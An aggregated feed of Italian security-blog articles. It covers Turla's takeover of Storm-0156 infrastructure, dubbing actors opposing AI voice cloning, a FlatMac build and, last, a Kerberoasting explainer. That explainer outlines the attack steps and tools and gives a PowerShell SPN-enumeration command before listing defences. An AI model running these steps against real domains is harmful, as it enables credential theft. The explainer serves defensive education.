Questo strumento sottolinea il livello di sofisticazione raggiunto da Turla e il suo impegno nel migliorare continuamente le sue capacità offensive. L’uso di backdoor fileless, abbinato a tecniche avanzate di evasione, rappresenta una minaccia critica per organizzazioni che si affidano esclusivamente a strumenti di sicurezza tradizionali. Per affrontare tali minacce, è fondamentale adottare soluzioni di monitoraggio comportamentale basate su intelligenza artificiale e strategie di protezione endpoint (EDR) proattive.

Questa analisi arricchisce ulteriormente il quadro già complesso dell’operazione Snowblind, dimostrando come Turla non si limiti a sfruttare infrastrutture rivali, ma implementi costantemente strumenti tecnologicamente avanzati per rafforzare il proprio arsenale cibernetico.

Chi sono i Protagonisti?

• Turla (Secret Blizzard): Considerato uno dei gruppi più sofisticati nel panorama delle minacce informatiche, con legami con l’intelligence russa, è attivo da decenni e si è specializzato in operazioni contro governi, entità militari e istituzioni strategiche. Ciò che distingue Turla è la sua capacità di adattarsi e innovare: la scelta di sfruttare infrastrutture di altri gruppi è un esempio lampante di questa strategia.
• Storm-0156 (Transparent Tribe / SideCopy): Operativo dal Pakistan, è noto per i suoi attacchi contro l’India e l’Afghanistan. Utilizza spesso tecniche di spear-phishing per compromettere le reti target, distribuendo malware come CrimsonRAT. Nonostante sia meno sofisticato di Turla, Storm-0156 è comunque una presenza significativa nel panorama delle minacce regionali.

Implicazioni e Riflessioni

L’operazione Snowblind è un esempio lampante di come il panorama delle minacce informatiche sia in continua evoluzione, caratterizzato da tattiche sempre più sofisticate e inaspettate. La capacità di Turla di sfruttare le infrastrutture di altri gruppi malevoli per raggiungere i propri obiettivi non solo evidenzia la complessità tecnica del cyber spionaggio moderno, ma rappresenta anche una sfida significativa per le strategie di difesa e attribuzione.

Questo caso mette in luce la necessità di una collaborazione ancora più stretta tra organizzazioni pubbliche e private, per condividere informazioni sulle minacce e sviluppare contromisure efficaci. Le aziende, in particolare quelle che operano in settori strategici come la difesa e il governo, devono adottare un approccio proattivo alla sicurezza, monitorando costantemente le loro infrastrutture e formando il personale per riconoscere e rispondere agli attacchi.

L’operazione Snowblind ci ricorda che nel mondo digitale odierno, nessuno è immune alle minacce cibernetiche. Solo attraverso un impegno continuo, un’innovazione tecnologica costante e una consapevolezza collettiva possiamo sperare di arginare l’avanzata di attori malevoli come Turla e i loro sofisticati metodi di spionaggio.

L'articolo Operazione Snowblind: Turla sfrutta le infrastrutture rivali per un sofisticato spionaggio cyber proviene da il blog della sicurezza informatica.

The Apple FlatMac was one of those 1980s concepts by designer [Hartmut Esslingers] that remained just a concept with no more than some physical prototypes created. That is, until [Kevin Noki] came across it in an Apple design book and contacted [Hartmut] to ask whether he would be okay with providing detailed measurements so that he could create his own.

Inside the 3D printed enclosure is a Raspberry Pi 4 running an appropriately emulated Macintosh, with a few modern features on the I/O side, including HDMI and USB. Ironically, the screen is from a 3rd generation iPad, which [Kevin] bought broken on EBay. There’s also an internal floppy drive that’s had its eject mechanism cleverly motorized, along with a modified USB battery bank that should keep the whole show running for about an hour. The enclosure itself is carefully glued, painted and sculpted to make it look as close to the original design as possible, which includes custom keycaps for the mechanical switches.

As far as DIY projects go, this one is definitely not for the faint of heart, but it’s fascinating to contrast this kind of project that’s possible for any determined hobbyist with the effort it would have taken forty years ago. The only question that’s left is whether or not the FlatMac would have actually been a practical system if it had made it to production. Although the keyboard seems decent, the ergonomics feel somewhat questionable compared to something more laptop-like.

youtube.com/embed/Grd_a4oi7qU?…

Thanks to [Daniel Doran] for the tip.

hackaday.com/2024/12/07/flatma…

Buon Sant'Ambrogio! Leggo che Amazon vuole rivoluzionare la logistica dell'ultimo miglio con una soluzione tecnologica straordinaria: la consegna via drone. Evidentemente la tecnologia non è solo in mano ai deficienti. Ci sono anche i tecnopirla.

spreaker.com/episode/dk-9x12-a…

Gli specialisti di Lumen Black Lotus Labs e Microsoft Threat Intelligence Team hanno scoperto che il gruppo di spionaggio informatico di lingua russa Turla (noto anche come Secret Blizzard) ha violato l’infrastruttura del gruppo di hacker pakistano Storm-0156 per condurre i propri attacchi segreti su reti già hackerate.

Secondo i ricercatori, questa campagna è iniziata nel dicembre 2022. Turla ha quindi ottenuto l’accesso alle reti che Storm-0156 aveva già compromesso (ad esempio, nelle organizzazioni governative afghane e indiane), e vi ha poi distribuito il proprio malware.
Diagramma della catena di compromesso di Microsoft
Lumen afferma di monitorare l’attività del gruppo Storm-0156 da diversi anni e che questi aggressori hanno concentrato i loro attacchi su India e Afghanistan. Durante questo monitoraggio, ad esempio, è stato scoperto un server di controllo che mostrava il banner “hak5 Cloud C2”. Di conseguenza, gli esperti sono giunti alla conclusione che gli hacker sono riusciti in qualche modo a installare un dispositivo fisico (come il dispositivo Wi-Fi Pineapple) sulla rete di un’organizzazione governativa indiana.

Ma alla fine, studiando gli attacchi Storm-0156, i ricercatori hanno scoperto che Turla aveva compromesso i suoi “colleghi” pakistani. Ciò è stato segnalato da diverse anomalie nella rete: ad esempio, tre indirizzi IP VPS hanno interagito con il server di controllo, che in precedenza era associato a un gruppo di lingua russa. Inoltre, gli esperti hanno attirato l’attenzione sui modelli e sulla trasmissione dei dati caratteristici dei “beacon”, che non erano affatto coerenti con le precedenti tattiche del gruppo pakistano.

Come si è scoperto, alla fine del 2022, Turla ha violato diversi nodi di controllo Storm-0156 e ha distribuito su di essi il proprio malware, inclusa una variante della backdoor TinyTurla, la backdoor TwoDash, lo strumento di monitoraggio degli appunti Statuezy e il downloader MiniPocket.

A loro volta, gli esperti di Microsoft affermano che Turla ha utilizzato l’accesso all’infrastruttura Storm-0156 per implementare backdoor nelle agenzie governative afghane, tra cui il Ministero degli Affari Esteri e la Direzione generale dell’intelligence del paese, nonché i consolati stranieri dell’Afghanistan.

Allo stesso tempo, Turla non si è limitata a compromettere i server di controllo Storm-0156 e ad attaccare obiettivi già hackerati. È stato riferito che intorno alla metà del 2023 gli hacker di lingua russa hanno effettuato movimenti laterali nell’infrastruttura Storm-0156 e hanno raggiunto le postazioni di lavoro. Ciò ha consentito a Turla di accedere agli strumenti dannosi di Storm-0156 (inclusi CrimsonRATe il trojan Wainscot scritto in Go), nonché a informazioni e credenziali precedentemente rubate.

Secondo Microsoft, Turla alla fine ha utilizzato la backdoor rubata a Storm-0156 solo una volta: per distribuire malware su un computer in India. Ma Turla ha installato backdoor sui server dello stesso Storm-0156, che ospitavano dati rubati dagli hacker pakistani alle istituzioni militari e di difesa indiane.

Vale la pena notare che questa non è la prima volta che Turla si comporta in questo modo. Già nel 2019 il gruppo ha utilizzato per i suoi attacchi l’infrastruttura e il malware del gruppo iraniano OilRig. Inoltre, Turla ha rubato dati dai sistemi OilRig, inclusi registri di keylogger, elenchi di directory, file, credenziali e strumenti dannosi come Neuron.

L'articolo Hacker di Stato contro Hacker di Stato: Turla prende il controllo di Storm-0156 proviene da il blog della sicurezza informatica.

“Proteggiamo le nostre voci, i nostri diritti e il doppiaggio umano” . Gli attori del doppiaggio si riuniscono martedì mattina a Parigi, in Place Diaghilev, proprio dietro l’Opéra Garnier. Sono preoccupati per l’ascesa dell’intelligenza artificiale, che minaccia la loro professione.

Un modo per fare pressione, perché le trattative avvengono contemporaneamente tra sindacati, studi di produzione e grandi piattaforme. Questi attori vogliono garanzie, perché l’intelligenza artificiale mette a rischio la loro passione.

A rischio 15.000 posti di lavoro

Oggi l’intelligenza artificiale è in grado di riprodurre le voci, salvo pochi dettagli. “È un furto di voci, un furto di anima, un furto di interpretazione”, avverte Olivia Lucciani. Nella sua gamma: voci per cinema, serie, pubblicità, videogiochi. “C’è una parte di noi che viene usata, sequestrata, non possiamo fare nulla”, continua l’attrice. “Ci vengono rubate le corde vocali, ma non solo. Sono anche il nostro strumento di lavoro: ci vengono derubati anche delle nostre interpretazioni, di ciò che sentiamo. Stiamo cercando di nutrire i sistemi di intelligenza artificiale con le nostre emozioni ”, aggiunge Patrick Kuban, è in particolare la voce fuori campo del canale Canal+.

Patrick Kuban racconta la disavventura di questo attore, la cui voce è stata copiata e riutilizzata per la narrazione di una cinquantina di documentari, visibili su YouTube. Ma le voci create dall’intelligenza artificiale mancano di profondità, crede l’attore: “Siamo qui per dare un’anima in più al testo. Dopo tre minuti, è ancora un po’ fastidioso, un po’ noioso da ascoltare perché ha sempre le stesse intonazioni. “

Il settore impiega 15.000 dipendenti in Francia, principalmente nell’Île-de-France, in una ventina di professioni: ingegneri del suono, direttori artistici, traduttori, ecc. “Se si usa l’intelligenza artificiale per doppiare un film non avremo più bisogno di me Ma non scompariremo del tutto”, sfuma Olivia Lucciani, “restano il teatro, il cinema, la tv, per ora.”

È richiesta una migliore supervisione

Questi doppiatori chiedono una clausola nel loro contratto, poche righe per impedire il recupero delle loro voci per addestrare l’intelligenza artificiale. “Le nostre voci vengono recuperate direttamente dalle nostre registrazioni oppure vengono recuperate da Internet. I film e le serie vengono raccolti “, spiega Patrick Kuban.

La professione chiede anche una legge sul doppiaggio in Francia. Temono che la versione francese dei film venga prodotta all’estero, da studi di produzione, utilizzando voci sintetiche. “Questa legge garantirebbe infatti al cittadino francese che domani, quando guarderà un film o una serie in televisione, avrà quasi la certezza di avere un minimo di attori umani nell’immagine e voci reali con un vero doppiaggio” , conclude Patrick Kuban, il quale ricorda che “le versioni francesi rappresentano in media l’85% degli ingressi cinematografici di film stranieri in Francia”.

L'articolo La battaglia delle voci: I doppiatori contro l’intelligenza artificiale a Parigi proviene da il blog della sicurezza informatica.

Quando si parla di sicurezza informatica, uno degli obiettivi principali degli attaccanti è compromettere le credenziali di sistema. Tra le tecniche di attacco più avanzate utilizzate su reti Windows basate su Active Directory c’è il Kerberoasting.

Questo attacco sfrutta una vulnerabilità inerente al protocollo di autenticazione Kerberos per ottenere hash delle password di account privilegiati e tentare di decifrarli offline. In questo articolo vedremo cos’è il Kerberoasting, come funziona passo dopo passo e quali strategie implementare per proteggere la rete aziendale.

Prenderemo inoltre in esame una dimostrazione pratica effettuata sul laboratorio creato in precedenza.

Che cos’è il Kerberoasting?

Il Kerberoasting è una tecnica di attacco che prende di mira i Service Principal Names (SPN) utilizzati dal protocollo Kerberos per autenticare i servizi su un dominio Active Directory. Gli SPN rappresentano identificatori unici dei servizi di rete, ad esempio un database SQL o un server web, associati a specifici account di servizio.

Gli attaccanti sfruttano questa tecnica per richiedere e ottenere ticket di servizio (Ticket Granting Service – TGS) legittimi dagli SPN. Ogni ticket viene crittografato con la password hash dell’account del servizio associato e, una volta ottenuto, può essere sottoposto ad attacchi di forza bruta offline per decifrare l’hash della password.

In poche parole:

1. L’attaccante ottiene i TGS emessi per un account di servizio.
2. Utilizza questi ticket per estrarre l’hash crittografato della password.
3. Esegue un attacco offline (forza bruta o attacco a dizionario) per tentare di decifrare la password dell’account del servizio.

Se l’attacco ha successo, l’attaccante ottiene accesso agli account privilegiati collegati ai servizi di rete, che spesso hanno credenziali elevate o addirittura amministrative.

Come Funziona il Kerberoasting?

Il Kerberoasting è un processo che si sviluppa in diversi step. Ecco come opera un attaccante:

Enumerazione degli SPN

L’attaccante, una volta ottenuto accesso a un dominio Active Directory, interroga il server Kerberos per una lista di SPN associati agli account di servizio. Ciò è possibile perché le informazioni sugli SPN sono facilmente accessibili da qualsiasi computer collegato al dominio, usando strumenti come PowerShell o tool di attacco già pronti come impacket, Rubeus o SetSPN.

Ad esempio, un comando PowerShell molto comune è:

Get-AdUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName

Questo comando elenca tutti gli utenti con un SPN associato.

Richiesta di Ticket TGS

Dopo aver identificato gli SPN, l’attaccante richiede al server Kerberos un ticket TGS associato a uno di questi servizi. La richiesta può essere fatta utilizzando un account legittimo all’interno del dominio (ad esempio un utente con credenziali valide ma con privilegi bassi).

Il ticket TGS restituito dal server Kerberos è crittografato con l’hash della password dell’account di servizio.

Estrazione dell’Hash

Una volta ricevuto il ticket TGS, l’attaccante usa tool di hacking come Rubeus, Impacket o Mimikatz per estrarre l’hash crittografico associato al ticket. Poiché l’hash è crittografato con la password dell’account di servizio, l’attaccante può ora tentare di decifrarlo.

Attacco di Decifrazione Offline

L’hash ottenuto viene sottoposto ad attacchi di forza bruta o a dizionario. Strumenti come Hashcat o John the Ripper vengono usati per decifrare la password. La sfida sta nella robustezza della password: più è complessa, più tempo ci vorrà per decifrarla.

Una volta decifrata, l’attaccante ottiene la password dell’account di servizio. Questo può portare all’escalation di privilegi, poiché molti account di servizio hanno privilegi elevati o accedono a risorse critiche della rete.

Perché il Kerberoasting è così efficace?

Il motivo per cui il Kerberoasting è così diffuso tra gli attaccanti è che:

• Non richiede privilegi elevati iniziali: Anche un utente con privilegi bassi può richiedere TGS per la maggior parte degli SPN.
• Le password di servizio sono spesso deboli: È comune che gli account di servizio abbiano password datate, riutilizzate o non aggiornate, agevolando la decifrazione dell’hash.
• L’attacco avviene offline: Una volta ottenuto il ticket TGS, l’intero processo di decifrazione può essere eseguito offline, senza alcun rischio che l’attività venga rilevata in tempo reale.

Come Proteggersi dal Kerberoasting

Per difendere la propria rete da attacchi di tipo Kerberoasting è fondamentale adottare una serie di contromisure tecniche e gestionali. Ecco alcune delle strategie più efficaci:

Password Sicure per gli Account di Servizio

Le password degli account di servizio dovrebbero rispettare requisiti di complessità elevati:

• Lunghezza minima di almeno 25 caratteri.
• Uso di combinazioni di lettere maiuscole, minuscole, numeri e simboli.
• Valutare l’utilizzo di password generate in modo casuale.

Inoltre, è consigliabile aggiornare periodicamente le password degli account di servizio.

Utilizzo di Managed Service Accounts (MSAs)

Gli account di servizio gestiti (MSA) di Windows e i group-managed service accounts (gMSA) automatizzano la gestione delle password degli account di servizio, rendendole di fatto non decifrabili. Questo elimina una delle vulnerabilità principali sfruttate dal Kerberoasting.

Limitare i Privilegi degli Account di Servizio

Gli account di servizio dovrebbero essere configurati seguendo il principio del minimo privilegio necessario. Questo significa che gli account di servizio non dovrebbero mai avere privilegi amministrativi, a meno che non siano assolutamente necessari.

Monitoraggio e Rilevamento di Attività Sospette

Implementare sistemi di monitoraggio (SIEM) che rilevino comportamenti sospetti nel dominio, come un numero insolitamente elevato di richieste TGS o richieste mirate a determinati SPN.

Disabilitare SPN Non Necessari

Alcuni account potrebbero avere SPN configurati erroneamente o inutilizzati. È importante fare un audit periodico degli SPN e rimuovere quelli non necessari.

Abilitare la Protezione AES

Kerberos supporta diversi tipi di cifratura, tra cui RC4 e AES. Configurare i domain controller per utilizzare esclusivamente AES encryption per proteggere i ticket TGS può ridurre notevolmente il rischio di attacchi Kerberoasting.

Conclusione

Il Kerberoasting è una tecnica avanzata ma relativamente comune tra gli attaccanti mirati a reti Windows. La sua efficacia deriva dalla possibilità di sfruttare informazioni disponibili pubblicamente sul dominio Active Directory e di condurre il cracking delle password offline, senza rischiare di essere rilevati immediatamente. Tuttavia, seguendo le pratiche di sicurezza consigliate, come password robuste, utilizzo di MSAs, monitoraggio continuo e limitazione dei privilegi, è possibile ridurre drasticamente il rischio di subire questo tipo di attacco.

L'articolo Kerberoasting: Cos’è, Come Funziona e dimostrazione pratica proviene da il blog della sicurezza informatica.